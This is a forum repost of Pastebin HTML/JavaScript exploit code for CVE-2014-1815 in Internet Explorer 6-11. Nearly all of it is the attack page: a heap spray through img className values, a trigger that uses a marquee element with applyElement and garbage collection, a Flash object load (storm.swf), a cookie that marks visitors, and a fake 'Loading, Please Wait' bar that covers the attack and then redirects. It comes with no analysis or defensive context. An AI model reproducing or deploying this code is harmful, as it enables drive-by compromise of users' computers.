CVE-2014-1815 Html code - Internet Explorer 6-11

Nytro · October 20, 2014

CVE-2014-1815 Html code

    1:  < !doctype html>
    2:  < html>
    3:  < head>
    4:  < meta http-equiv="Cache-Control" content="no-cache"/>
    5:  < sc?ript >
    6:  func?tion stc()
    7:  {
    8:  var Then = new Date();
    9:  Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
    10:  document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
    11:  }
    12:  func?tion cid()
    13:  {
    14:  var swf = 0;
    15:  try {
    16:  swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
    17:  }
    18:  if (!swf)
    19:  return 0;
    20:  var cookieString = new String(document.cookie);
    21:  if(cookieString.indexOf("d93kaj3Nja3") == -1)
    22:  {stc(); return 1;}else{ return 0;}
    23:  }
    24:  String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);}
    25:  var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1);
    26:  var ll=new Array();
    27:  for (i=0;i< 3333;i++)ll.push(document.create?Element("img"));
    28:  for(i=0;i< 3333;i++) ll[i].className=tpx;
    29:  for(i=0;i< 3333;i++) ll[i].className="";
    30:  CollectGarbage();
    31:  func?tion b2()
    32:  {
    33:  try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){}
    34:  try{xdd.outerText='';}catch(exception){}
    35:  CollectGarbage();
    36:  for(i=0;i< 3333;i++) ll[i].className=tpx;
    37:  }
    38:  func?tion a1(){
    39:  if (!cid())
    40:  return;
    41:  document.body.contentEditable="true";
    42:  try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){}
    43:  try{document.selection.createRange().select();}catch(exception){}
    44:  }
    45:  < / sc?ript >
    46:  < /head>
    47:  < body onload='setTimeout("a1();",2000);' onresize=b2()>
    48:  < marquee id=xdd > < /marquee>
    49:  < object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
    50:  < param name="movie" value="storm.swf" />
    51:  < param name="quality" value="high" />
    52:  < param name="bgcolor" value="#ffffff" />
    53:  < param name="allowScriptAccess" value="sameDomain" />
    54:  < param name="allowFullScreen" value="true" />
    55:  < /object>
    56:  < /body>
    57:  < body>
    58:  < form name=loading>
    59:  ¡¡< p align=center> < font color="#0066ff" size="2"> Loading....,Please Wait< /font> < font color="#0066ff" size="2" face="verdana"> ...< /font>
    60:  ¡¡¡¡< input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
    61:  ¡¡¡¡
    62:  ¡¡¡¡< input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
    63:  ¡¡¡¡< sc?ript > ¡¡
    64:  var bar=0¡¡
    65:  var line="||"¡¡
    66:  var amount="||"¡¡
    67:  count()¡¡
    68:  func?tion count(){¡¡
    69:  bar=bar+2¡¡
    70:  amount =amount + line¡¡
    71:  document.loading.chart.value=amount¡¡
    72:  document.loading.percent.value=bar+"%"¡¡
    73:  if (bar< 99)¡¡
    74:  {setTimeout("count()",500);}¡¡
    75:  else¡¡
    76:  {window.location = "http://www.google.com.hk";}¡¡
    77:  }< / sc?ript >
    78:  ¡¡< /p>
    79:  < /form>
    80:  < p align="center"> Wart,< a style="text-decoration: none" href="http://www.google.com.hk"> < font color="#FF0000"> kick me< /font> < /a> .< /p>
    81:  < /body>
    82:  < /html>

Sursa: CVE-2014-1815 Html code - Pastebin.com

Sign In

CVE-2014-1815 Html code - Internet Explorer 6-11

Recommended Posts

Nytro

Join the conversation

Browse

Activity

Pages